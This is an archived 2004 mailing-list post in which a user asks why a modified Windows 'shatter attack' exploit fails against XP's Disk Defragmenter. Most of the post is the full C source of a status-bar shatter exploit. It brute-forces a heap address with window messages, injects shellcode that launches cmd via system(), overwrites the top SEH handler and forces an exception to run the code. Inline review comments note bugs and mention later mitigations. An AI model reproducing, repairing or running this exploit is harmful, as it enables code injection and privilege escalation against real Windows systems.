>
>
> hello all,
>
> recently i was playing with the >> STATUS-BAR << shatter-attack code provided
> by brett.moore_at_security-assessment.com
>
> the code with tiny modifications is attached here.
>
> the problem is ...
>
> xp.sp1 TOP SEH at 0x77ed73b4 was getting overwritten with 0x77ed74c0, where my
> shellcode resides.
>
> but even after that the code didn't get executed. i was attacking the
> "disk defragmenter" utility which comes with windows XP.
>
> can anyone please point out where i'm wrong ??
>
> thank u.
>
> [ i'm attaching a screen-shot of my desktop when attacking ]
>
> //=========================================================================
>
> /*************************************************************************************
> * Statusbar Control Shatter exploit
> *
> * Demonstrates the use of a combination of windows messages to;
> * - brute force a useable heap address
> * - place structure information inside a process
> * - inject shellcode to known location
> * - overwrite 4 bytes of a critical memory address
> *
> * 4 Variables need to be set for proper execution.
> * - tWindow is the title of the programs main window
> * - sehHandler is the critical address to overwrite
> * - shellcodeaddr is the data space to inject the code
> * - heapaddr is the base heap address to start brute forcing
> *
> * Local shellcode is Win2kSp4 ENG Hardcoded because of unicode issues
> * Try it out against any program with a progress bar
> *
>
> *************************************************************************************/
>
> #include <windows.h>
> #include <commctrl.h>
> #include <stdio.h>
>
> // Local No Null Cmd Shellcode.
> // Byte string as given in the post; main() overwrites the 4 bytes at offset 8
> // with the address it resolves via GetProcAddress(). sizeof(exploit) counts
> // the terminating NUL as well, which IterateWindows() also sends.
> BYTE exploit[]
="\x90\x68\x63\x6d\x64\x00\x54\xb9\xc3\xaf\x01\x78\xff\xd1\xcc";
>
> // Scratch buffer filled by GetClassName() in IterateWindows().
> char g_classNameBuf[ 256 ];
> // Exact title of the target's main window, as matched by FindWindow().
> char tWindow[]="disk defragmenter";
>
> // All four values are hard-coded for one specific OS build (see the header
> // comment). heapaddr can be overridden from argv[1] as hex in main().
> long sehHandler = 0x77ed73b4; // Critical Address To Overwrite
> long shellcodeaddr = 0x77ed74c0; // Known Writeable Space Or Global Space
> unsigned long heapaddr = 0x00100000; // Base Heap Address
> long mainhWnd; // HWND of the target's main window, stored as a long
>
> // NOTE(review): BruteForceHeap is declared here with one parameter but
> // defined below with three (HWND, long, long); the only call site passes one.
> void doWrite(HWND hWnd, long tByte,long address);
> void BruteForceHeap(HWND hWnd);
> void IterateWindows(long hWnd);
>
> // Entry point. Resolves the address patched into exploit[], optionally reads a
> // base heap address from argv[1], finds the target's main window by title and
> // walks its child windows via IterateWindows(). Returns 0 on every path,
> // including when the window is not found.
> int main(int argc, char *argv[])
> {
>
> HMODULE hMod;
> DWORD ProcAddr;
> long x; // unused
>
>
> //making the shellcode ready
> // NOTE(review): hMod is not checked for NULL before GetProcAddress().
> hMod = LoadLibrary("msvcrt.dll");
> ProcAddr = (DWORD)GetProcAddress(hMod, "system");
> if(ProcAddr != 0)
> *(long *)&exploit[8] = ProcAddr; // 4-byte store at offset 8 of exploit[]
> //***************************
>
> //printf("+ Enter Window Title\n",tWindow);
> //flushall();
> //gets(tWindow);
>
>
>
> // argv[1] is parsed as hex; sscanf's return value is not checked, so a
> // non-hex argument silently leaves heapaddr at its default.
> if (argc == 2)
> sscanf(argv[1],"%lx",&heapaddr);// Oddity
>
> // NOTE(review): heapaddr and mainhWnd are long/unsigned long but printed with
> // %x; %lx is the matching conversion.
> printf("%% Using base heap address...0x%xh\n",heapaddr);
> printf("+ Finding %s Window...\n",tWindow);
> // The HWND is stored in a long; the NULL comparison below is an integer
> // compare against 0.
> mainhWnd = (long)FindWindow(NULL,tWindow);
>
> if(mainhWnd == NULL)
> {
> printf("+ Couldn't Find %s Window\n",tWindow);
> return 0;
> }
> printf("+ Found Main Window At......0x%xh\n",mainhWnd);
> IterateWindows(mainhWnd);
> printf("+ Done...\n");
>
> return 0;
> }
>
>
> // Depth-first walk over the children of hWnd. After the recursion, the window's
> // class name is compared with "msctls_statusbar32"; on a match the sequence from
> // the file header is run (BruteForceHeap, one doWrite per byte of exploit[],
> // four doWrite calls covering sehHandler, then two SendMessage calls) and the
> // process exits with exit(0). Any other class falls through and returns.
> // NOTE(review): every step here is a window message sent to another process's
> // window. On Windows Vista and later, UIPI is the documented mitigation: it
> // blocks most messages sent to a window owned by a higher-integrity process.
> void IterateWindows(long hWnd)
> {
>
> long childhWnd,looper;
>
> // GW_CHILD yields the first child, GW_HWNDNEXT the next sibling.
> childhWnd = (long)GetNextWindow((HWND)hWnd,GW_CHILD);
> while (childhWnd != NULL)
> {
> IterateWindows(childhWnd);
> childhWnd = (long)GetNextWindow((HWND)childhWnd ,GW_HWNDNEXT);
> }
>
> // g_classNameBuf is a global; it is only read after the recursive calls above
> // have completed, so the recursion does not clobber this frame's result.
> GetClassName( (HWND)hWnd, g_classNameBuf, sizeof(g_classNameBuf) );
> if ( strcmp(g_classNameBuf, "msctls_statusbar32") ==0)
> {
>
> // Find Heap Address
> // NOTE(review): called with one argument although the definition takes three.
> BruteForceHeap((HWND) hWnd);
> //printf("+ Enter heapaddr : \n");
> //scanf("%lx",&heapaddr);
>
> // Inject shellcode to known address
> printf("+ Sending shellcode to......0x%xh\n",shellcodeaddr);
> // sizeof(exploit) includes the terminating NUL, so one extra byte is sent;
> // looper is a signed long compared against a size_t.
> for (looper=0;looper<sizeof(exploit);looper++)
> doWrite((HWND)hWnd, (long) exploit[looper],(shellcodeaddr + looper));
> // Overwrite SEH
> printf("+ Overwriting Top SEH.......0x%xh\n",sehHandler);
>
>
> // shellcodeaddr is split into its four bytes, least significant first.
> doWrite((HWND)hWnd, ((shellcodeaddr) & 0xff),sehHandler);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 8) & 0xff),sehHandler+1);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 16) & 0xff),sehHandler+2);
> doWrite((HWND)hWnd, ((shellcodeaddr >> 24) & 0xff),sehHandler+3);
>
>
>
> // Cause exception
> printf("+ Forcing Unhandled Exception\n");
> // NOTE(review): getch() and exit() come from <conio.h> and <stdlib.h>, neither
> // of which is among the visible includes.
> getch();
>
> SendMessage((HWND) hWnd,(UINT) PBM_GETRANGE,0,1); //PROGRESSS_BAR
> SendMessage((HWND) hWnd,(UINT) SB_GETPARTS,1,1);
>
> printf("+ Done...\n");
> exit(0);
> }
> }
>
> // Steps the global heapaddr upward by 2500 until two SB_GETTEXTLENGTH replies
> // match the pattern below: exactly 1 after the main window title is filled with
> // 'X' (0x58), then greater than 1 after it is filled with 0x80. Each attempt is
> // printed. The result is left in heapaddr; the loop has no upper bound, so the
> // function only returns when a match is found.
> // NOTE(review): tByte and address are never used and the prototype at the top of
> // the file omits them; return(0) in a void function should be a bare return;.
> // foundHeap is never set, so the while condition is always true.
> void BruteForceHeap(HWND hWnd, long tByte,long address)
> {
> long retval;
> BOOL foundHeap = FALSE;
> char buffer[5000];
> memset(buffer,0,sizeof(buffer));
>
> while (!foundHeap)
> {
> printf("+ Trying Heap Address.......0x%xh ",heapaddr);
>
> // Fills 4999 bytes; buffer[4999] stays 0 from the memset above.
> memset(buffer,0x58,sizeof(buffer)-1); // settin to X
>
> // Set Window Title
> // NOTE(review): mainhWnd is a long passed where an HWND is expected, and
> // &buffer is a char(*)[5000] (same address as buffer, different type).
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> // heapaddr is passed as the LPARAM of SB_SETTEXT, which expects a string pointer.
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> printf("%d",retval);
>
> if(retval == 1)
> {
> // First Retval should be 1
> memset(buffer,0x80,sizeof(buffer)-1);
> // Set Window Title
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
> // Set Part Contents
> SendMessage((HWND) hWnd,(UINT) SB_SETTEXT,0,heapaddr);
> retval=SendMessage((HWND) hWnd,(UINT) SB_GETTEXTLENGTH ,0,0);
> if(retval > 1)
> {
> // Second should be larger than 1
> printf(" : %d - Found Heap Address : 0x%x\n",retval,heapaddr);
> return(0);
> }
> }
> printf("\n");
> heapaddr += 2500;
> }
> }
>
>
> // Fills a 4999-byte buffer with the low byte of tByte (memset converts its int
> // argument to unsigned char), sets that buffer as the main window's title, then
> // sends SB_SETPARTS with heapaddr and SB_GETPARTS with address as the LPARAM.
> // hWnd: the status bar window; tByte: fill value; address: value passed as the
> // LPARAM of SB_GETPARTS. Called once per byte from IterateWindows(). No return
> // values from SendMessage() are checked.
> void doWrite(HWND hWnd, long tByte,long address)
> {
> char buffer[5000];
>
> memset(buffer,0,sizeof(buffer));
> memset(buffer,tByte,sizeof(buffer)-1);
> // Set Window Title
> // NOTE(review): mainhWnd is a long passed where an HWND is expected; &buffer
> // has the address of buffer but type char(*)[5000].
> SendMessage( mainhWnd,(UINT) WM_SETTEXT,0,&buffer);
>
> // Set Statusbar width
> SendMessage( hWnd,(UINT) SB_SETPARTS,1,heapaddr);
> SendMessage( hWnd,(UINT) SB_GETPARTS,1,address);
>
> }
>
> //=========================================================================
Received on Jul 07 2004